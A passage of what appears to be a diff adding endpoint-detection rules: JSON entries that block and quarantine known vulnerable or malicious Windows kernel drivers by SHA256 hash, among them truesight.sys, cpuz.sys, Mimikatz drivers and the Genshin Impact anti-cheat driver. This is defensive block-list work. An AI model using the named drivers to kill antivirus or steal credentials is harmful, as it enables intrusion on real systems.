+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.986235Z",
+ "creation_date": "2026-03-23T11:45:29.986237Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.986242Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8a2482e19040d591c7cec5dfc35865596ce0154350b5c4e1c9eecc86e7752145",
+ "comment": "Vulnerable Kernel Driver (aka VBoxUSBMon.sys) [https://www.loldrivers.io/drivers/babe348d-f160-41ec-9db9-2413b989c1f0/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "84531396-914a-500f-b688-59b0e4cd1e45",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474416Z",
+ "creation_date": "2026-03-23T11:45:30.474420Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474428Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d5e671c37f0eeb437d1ef480ff15b855ef2fdbb127f9130443fbaa279c5a3d72",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "84633318-4039-5bee-b38f-35b8ce54a2fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475244Z",
+ "creation_date": "2026-03-23T11:45:30.475247Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475256Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d25b5e4d07f594c640dcd93cfc8ab3f0a38348150bd0bfae89f404fbb0d811c6",
+ "comment": "Malicious Kernel Driver (aka e29f6311ae87542b3d693c1f38e4e3ad.sys) [https://www.loldrivers.io/drivers/c00f818c-1c90-4b47-bc29-fb949f6efb65/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "84797ff1-5acd-52ff-b177-b16519541de5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971096Z",
+ "creation_date": "2026-03-23T11:45:29.971099Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971107Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb6ad7998aa1eb9c3b08cb7185bd4425fcc9c9b02ecfb4a3492e7b93033e8b11",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "847abe91-788c-5720-a276-020863f38da3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611830Z",
+ "creation_date": "2026-03-23T11:45:29.611832Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611837Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "848719fb-9e90-5a1d-a54d-e9f29a293d35",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146783Z",
+ "creation_date": "2026-03-23T11:45:32.146785Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146790Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b87085d408c250bdaf933642aa64975a7127cbe393023aaf53d918cd8bf0e3ae",
+ "comment": "Vulnerable Kernel Driver (aka isodrivep64.sys) [https://www.loldrivers.io/drivers/bd6490c2-20ea-441e-803c-bc3b957dae4c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8489d886-cf22-513f-8b66-6da08cde7b85",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148791Z",
+ "creation_date": "2026-03-23T11:45:31.148793Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148799Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f77f88061432157635b71a7c388bbd9eefbac401b9c8620d8787ee03a5e5c95",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "84906764-36ec-58dd-bd92-4a6d56e47dbe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809648Z",
+ "creation_date": "2026-03-23T11:45:31.809651Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809659Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bdb6e4d73f7949bf58b4b854a3b85d20ef7e4486f88c2d2d02fb4922b7138dc2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "849103dd-af6d-512f-93db-f0df94e049d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488117Z",
+ "creation_date": "2026-03-23T11:45:31.488119Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488124Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33475258d25e34a019400861d377c520c4b7e516e0141daf8a6a5e25172baf83",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8494bb16-bc5a-59b3-b5bb-db814195af7e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980064Z",
+ "creation_date": "2026-03-23T11:45:29.980066Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980071Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f6fec8f7890d032461b127332759c88a1b7360aa10c6bd38482572f59d2ba8b",
+ "comment": "Malicious Kernel Driver (aka mJj0ge.sys) [https://www.loldrivers.io/drivers/412f4aaf-5525-458c-b87e-311e504b856d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "84b5b0ab-fbb1-5b19-8deb-2bfb214f6e1c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618761Z",
+ "creation_date": "2026-03-23T11:45:29.618764Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e88617bf6581b7f48ab216f5a2cf40cfa728354f81a631568823426461902c87",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "84c3f592-bab1-5c28-a5d1-587304b595a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976295Z",
+ "creation_date": "2026-03-23T11:45:29.976299Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976308Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "575e58b62afab094c20c296604dc3b7dd2e1a50f5978d8ee24b7dca028e97316",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "84c8674f-d53d-5800-842b-c444e2d29e59",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973722Z",
+ "creation_date": "2026-03-23T11:45:29.973724Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973729Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "654c5ba47f74008c8f49cbb97988017eec8c898adc3bb851bc6e1fdf9dcf54ad",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "84ce4f64-8e4d-56b0-9474-40395cd00e78",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825290Z",
+ "creation_date": "2026-03-23T11:45:30.825294Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825302Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fd4e5d356f9c1f4fb71f8e0b3f20f7fd40c4fac0ccb8912460301c927362044d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "84cfd4c4-a9b6-5c14-9ae0-2e3ea10297ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829808Z",
+ "creation_date": "2026-03-23T11:45:30.829810Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829816Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "70ad5c343b092a4e0738787feb772680f68f2014129e1fd6ae1eae16f475d735",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "84e7457a-690b-56a1-83bd-8ab5a142465c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811663Z",
+ "creation_date": "2026-03-23T11:45:31.811665Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811670Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5da99b951bad823261775596d6972183897a0eb005f6158e8406008781e87868",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "84f10e98-0807-508e-9e3c-f0f7285ba74c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811627Z",
+ "creation_date": "2026-03-23T11:45:31.811630Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811635Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42a56620cf2d1f718a9082e0ad37771d6f9c77c05cb65043043cbeaf10f8976a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "84f6c9ec-7d75-58af-bf29-0e1cf76381a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483405Z",
+ "creation_date": "2026-03-23T11:45:31.483409Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483418Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a09bf49a5d3cfe891ac4db204c4c38a977c7bbcc6668c445c319035c1889b1b2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8503e349-8c4a-58b6-af9c-5560dfcebfe9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474959Z",
+ "creation_date": "2026-03-23T11:45:30.474962Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474971Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7e3bd414674a3258be7ce384619b74946bafa218648a00c04e4e74f987f5723",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8520447a-caad-5d11-bdf5-8ad25e15a0e0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140636Z",
+ "creation_date": "2026-03-23T11:45:31.140638Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140643Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29bdcffcee5ddef60fa022fe42957b4309afd40ab2504f148a3eea51625bb973",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "852d5ba8-3cae-5b4d-8bdc-baaea092ed03",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492803Z",
+ "creation_date": "2026-03-23T11:45:31.492805Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492811Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f5de6c3636e996c5173f1277e7639b84f9149229ace4582e08a8a1b14fcadf8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "852dd15a-d0a6-5fb0-b8b2-9d5b703becaf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462000Z",
+ "creation_date": "2026-03-23T11:45:30.462003Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462012Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e5ddfa39540d4e7ada56cdc1ebd2eb8c85a408ec078337488a81d1c3f2aaa4ff",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85300aa9-a081-5a81-8baa-7bcb613c0424",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489702Z",
+ "creation_date": "2026-03-23T11:45:31.489705Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489712Z",
+ "rule_level": null,
+ "rule_level_override": null,
